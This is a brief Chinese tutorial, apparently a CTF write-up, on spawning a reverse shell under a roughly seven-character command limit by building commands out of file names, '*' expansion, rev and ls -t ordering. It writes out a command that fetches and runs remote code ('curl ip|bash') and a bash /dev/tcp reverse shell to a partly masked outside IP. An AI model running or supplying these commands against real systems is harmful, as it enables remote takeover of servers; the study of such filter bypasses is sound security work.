限制命令长度如何反弹shell

问题：限制命令在7句以内如何反弹shell

先来看一个命令

直接输入一个*，发现输出了hello_qf.来看一下如何实现

在一个新的目录中，我们输入这样的命令就可以输出hello_qf了。因为输入*就是echo hello_qf

于是输出了hello_qf.

那我们再来看一下使用命令ls -l

有两个方法：

方法一：

利用rev把字符串反过来。

rev作用：把字符串头变成尾，尾变成头翻转

test的内容

this is test

开始操作：

>dir原因

把 a 和 b 写到 c 里面

dir a b>c

执行了*>v,就是

dir l- sl > v

>v使用字母v的原因

*v>x就是

rev v

方法二：

待会使用反弹shell就是用这个方法，利用ls -t 的时间顺序来实现执行命令

反弹shell:

首先要确立一个反弹shell的语句，因为我们要设置为这个文件名，所以要尽量简单，而且尽量少有那种奇怪的符号。于是确立这个语句：

curl ip/shell.txt|bash

shell.txt的内容就是反弹shell

bash -i >& /dev/tcp/47.xxx.xxx.51/2333 0>&1

但是这里面有一个'/'要避免，那我们就把这个shell.txt设置成默认页面，然后命令变成：

curl ip|bash

 

以上是命令

到服务器看一眼：

成功反弹shell